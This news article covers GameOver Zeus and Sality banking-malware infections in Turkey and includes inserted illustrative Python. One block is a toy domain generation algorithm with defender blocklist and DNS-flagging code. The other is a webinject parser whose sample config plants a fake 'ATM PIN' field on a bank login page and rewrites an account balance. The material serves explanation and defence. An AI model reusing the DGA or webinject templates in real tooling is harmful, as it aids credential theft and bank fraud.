Windows XP-Heavy Turkey Overrun with GameOver Zeus Infections

GameOver Zeus and Sality banking malware infections are rampant in emerging countries such as Turkey, where older, unpatched computers are prevalent and security awareness is low.

Like predators, criminals who profit online seek out weak prey.

In the context of cybercrime, emerging countries such as Brazil, South Korea and Turkey among many others are in the crosshairs because of a number of factors, including a prevalence of outdated and unpatched computers and lower levels of security awareness within the general population.

Turkey is one country feeling the wrath more than most in Europe. A study published by CSIS of Denmark shows the country is overrun with banking malware infections, in particular GameOver Zeus and Sality.

For a country with half the number of Internet users that Germany has, more than 91,000 GameOver Zeus infections and more than 65,000 Sality infections were reported in the first quarter of the year. That works out to 2.85 GameOver Zeus and 1.85 Sality infections per 1,000 Internet users. By contrast, Germany has 1.62 GameOver Zeus infections and 0.05 Sality infections per 1,000 users.

“From a criminal’s perspective, given two valuable targets (e.g., two banks), it makes business sense to go after the weaker of the two targets. This approach is rewarded with the same or even a higher return as it is likely to successfully compromise more victims of the weaker target,” wrote Stephan Frei, PhD, in a recent CSIS report. “Thus, emerging countries such as Turkey will continue to be specifically targeted as long as their security is not on par with that of comparable countries.”

The most damning number with regard to Turkey’s overall security posture is that Windows XP has more than twice the market share there that it has in Germany, Frei wrote. Turkey’s less secure standing compared with similar targets, he said, makes it easier pickings.

Zeus, and to a lesser extent Sality, are veteran families of financial malware. Together they account for millions in fraud losses from personal and commercial banking accounts. They spread in a variety of ways, including exploit kits, spear phishing campaigns and drive-by downloads, all with the purpose of stealing credentials and other sensitive information that leads to bank fraud and identity theft.

With Turkey’s high percentage of Windows XP computers in circulation (23.4 percent) compared with the average for the rest of Europe (16.4 percent), more machines are exposed to both advanced and commodity attacks. XP lacks memory-corruption exploit mitigations that later versions of Windows enable by default, such as address space layout randomization (ASLR) and SEHOP, so the browser and document exploits that exploit kits carry succeed far more reliably on it. And with Microsoft’s support for XP having ended in April 2014, an unpatched XP machine stays unpatched for good.

Large Zeus botnets, many of which now locate their command-and-control infrastructure through peer-to-peer networks or domain generation algorithms (DGAs) rather than a fixed set of central servers, are resistant to takedown efforts, and those that are disrupted quickly resurface. A DGA lets each bot compute the day’s candidate rendezvous domains from the date and a hard-coded seed, so the operators only need to register one of them, and seizing any single domain or server does not sever the botnet.
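To make the DGA mechanism concrete, here is an added, illustrative example that is not code from the CSIS report and is not the real GameOver Zeus algorithm: a toy DGA that derives a daily domain list from a hypothetical hard-coded seed, plus the defender’s side of the same computation, which precomputes the next month of domains from a recovered seed and flags resolver queries that hit them. The seed, the domain count, the TLD set and the DNS log lines are all constructed for the example.

```python
import datetime
import hashlib

# Constructed, illustrative DGA for demonstration only. It is NOT the GameOver Zeus
# algorithm, and SEED is a hypothetical value; real families differ in hash function,
# alphabet, domains per day and TLD set.
SEED = "illustrative-seed"
TLDS = (".com", ".net", ".org", ".biz")
PER_DAY = 8


def dga_domains(day, count=PER_DAY, seed=SEED):
    """Return the candidate rendezvous domains a bot would try on `day`.

    The bot and its operators share only `seed`; everything else is derived from
    the calendar date, so both sides compute the same list without any contact.
    """
    domains = []
    for i in range(count):
        material = f"{seed}|{day.isoformat()}|{i}".encode()
        digest = hashlib.sha256(material).hexdigest()
        # Map the first 12 hex nibbles onto the letters a-p so the label is purely alphabetic.
        label = "".join(chr(ord("a") + int(ch, 16)) for ch in digest[:12])
        domains.append(label + TLDS[i % len(TLDS)])
    return domains


def precompute_blocklist(start, days, seed=SEED):
    """Defender side: with the seed recovered from a sample, enumerate every domain the
    bots will try over the next `days` days so they can be blocked or sinkholed before
    the operators register them."""
    blocklist = set()
    for offset in range(days):
        blocklist.update(dga_domains(start + datetime.timedelta(days=offset), seed=seed))
    return blocklist


def flag_dns_log(lines, blocklist):
    """Return (client_ip, domain) pairs for queries that hit a precomputed DGA domain.

    The log format is a constructed one: '<timestamp> <client-ip> query <qtype> <name>'.
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5 or fields[2] != "query":
            continue
        name = fields[4].rstrip(".").lower()
        if name in blocklist:
            hits.append((fields[1], name))
    return hits


DAY = datetime.date(2014, 5, 12)
BLOCKLIST = precompute_blocklist(DAY, 30)

# Constructed resolver log: three ordinary lookups and one infected host (10.0.0.12)
# asking for a domain from today's DGA list.
SAMPLE_LOG = [
    "2014-05-12T09:58:41 10.0.0.7 query A www.example.com",
    "2014-05-12T09:59:02 10.0.0.12 query A update.antivirus.example",
    f"2014-05-12T10:01:03 10.0.0.12 query A {dga_domains(DAY)[3]}",
    "2014-05-12T10:01:05 10.0.0.12 query A www.bank.example",
]

if __name__ == "__main__":
    print("DGA domains for", DAY, ":", dga_domains(DAY))
    print("Flagged queries:", flag_dns_log(SAMPLE_LOG, BLOCKLIST))
```

The precomputation is the whole point of the defender’s interest in DGA seeds: once the seed is known, every future domain can be registered or sinkholed ahead of the operators, which is why botnets that pair a DGA with a peer-to-peer fallback are so much harder to keep down. Without the seed, detection has to fall back on heuristics such as a single host resolving many never-before-seen, high-entropy names, which is noisier than the exact match shown here.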

CSIS said it collected and analyzed more than 4,000 botnet configuration files in the last 12 months, and learned much about the domain blacklists the bots use to keep infected machines away from antivirus and intrusion detection vendors’ update and signature servers, as well as the webinjects the malware families use to hijack browser sessions and steal credentials. Most of the top antivirus vendors and technology leaders are among the top 20 entries on most domain blacklists, CSIS discovered. As for the webinjects, most modify specific banking login pages; more than 2,000 webinjects were recovered, targeting banks, social media platforms, airlines, ecommerce sites and more, and new webinjects were added to these campaigns at a rate of more than 4.3 per day, CSIS said.
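A webinject is a small configuration entry the bot applies to a page after the browser has received it over TLS, which is why the bank’s server sees nothing unusual. The following added example, not code from CSIS or from the malware, parses a constructed sample written in the widely documented Zeus-family webinject syntax (`set_url` followed by `data_before`, `data_inject` and `data_after` blocks, each closed by `data_end`) and applies it to a constructed login page and account page. The bank URLs, the injected PIN field and the balance value are hypothetical; the apply function implements the documented semantics, where `data_inject` replaces whatever sits between the `data_before` and `data_after` matches, and a `*` in a pattern is a wildcard.

```python
import re

# Constructed sample in the Zeus-family webinject syntax. Hostnames and field names are
# hypothetical. Entry 1 adds a fake "ATM PIN" field after the password box on a login page;
# entry 2 rewrites the displayed balance on an account page (hiding a fraudulent transfer).
SAMPLE_WEBINJECT = """\
set_url https://bank.example/login* GP
data_before
<input type="password"*>
data_end
data_inject
<label>ATM PIN</label><input type="text" name="atm_pin">
data_end
data_after

data_end
set_url https://bank.example/account* G
data_before
<span id="balance">
data_end
data_inject
1,000.00
data_end
data_after
</span>
data_end
"""

BLOCKS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text):
    """Parse webinject entries into dicts with url, flags and the three data blocks.

    Flags follow the documented convention: G applies to GET requests, P to POST.
    """
    entries, current, block, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            entries.append(current)
        elif line in BLOCKS:
            block, buf = line, []
        elif line == "data_end" and block is not None and current is not None:
            current[block] = "\n".join(buf)
            block = None
        elif block is not None:
            buf.append(line)
    return entries


def _wildcard_to_regex(pattern):
    """Escape a pattern literally, then turn the injector's '*' into a non-greedy wildcard."""
    return re.escape(pattern).replace(r"\*", ".*?")


def url_matches(url_pattern, url):
    return re.fullmatch(_wildcard_to_regex(url_pattern), url) is not None


def apply_webinject(entry, html):
    """Return (modified_html, applied). Content between the data_before and data_after
    matches is replaced by data_inject; an empty data_after means insert right after
    data_before, and an empty data_before means the page start."""
    start = 0
    if entry["data_before"]:
        m = re.search(_wildcard_to_regex(entry["data_before"]), html, re.S)
        if not m:
            return html, False
        start = m.end()
    end = start
    if entry["data_after"]:
        m = re.search(_wildcard_to_regex(entry["data_after"]), html[start:], re.S)
        if not m:
            return html, False
        end = start + m.start()
    return html[:start] + entry["data_inject"] + html[end:], True


def inject_page(entries, url, html):
    """Apply every entry whose set_url pattern matches the page URL."""
    for entry in entries:
        if url_matches(entry["url"], url):
            html, _ = apply_webinject(entry, html)
    return html


# Constructed pages standing in for what the bank actually served.
LOGIN_PAGE = ('<form action="/login"><input type="text" name="user">'
              '<input type="password" name="pass"><button>Log in</button></form>')
ACCOUNT_PAGE = '<p>Balance: <span id="balance">12.34</span></p>'

if __name__ == "__main__":
    entries = parse_webinjects(SAMPLE_WEBINJECT)
    print(inject_page(entries, "https://bank.example/login?lang=en", LOGIN_PAGE))
    print(inject_page(entries, "https://bank.example/account/summary", ACCOUNT_PAGE))
```

For a bank, the practical consequence is that server-side page integrity checks cannot see the modification; detection has to come from the client (for example, JavaScript that reports unexpected DOM fields back to the bank) or from behavioural signals such as a login that suddenly submits a field the real form never had.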

As a result, enterprises such as financial institutions must do business with a large number of potentially compromised computers, and that requires a healthy mix of risk assessment, fraud detection and intrusion detection capabilities.

“A thorough understanding and monitoring of cyber criminals’ capabilities is essential to prepare against and defeat modern attacks,” Frei said. “Without viable threat intelligence on cybercrime operations, organizations focus on defending against known threats and will be taken by surprise by any kind of new security challenge, or breaches, which learned to happen frequently.”
